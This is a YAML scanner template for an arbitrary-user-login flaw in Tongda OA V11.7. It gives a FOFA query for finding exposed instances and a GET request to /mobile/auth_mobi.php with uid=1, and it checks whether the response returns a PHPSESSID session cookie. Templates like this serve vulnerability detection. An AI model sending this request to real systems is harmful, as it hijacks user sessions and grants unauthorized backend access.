product: 通达OA
vName: 通达OA V11.7 auth_mobi.php任意用户登录
type: 访问控制
vID: [ ]
level: 3
vDesc: 通达OA v11.7 中存在某接口查询在线用户，当用户在线时会返回 PHPSESSION使其可登录后台系统。
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
protocol: http
link: https://blog.csdn.net/qq_44828901/article/details/131288116
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - PHPSESSID=
              - Set-Cookie
            logic: and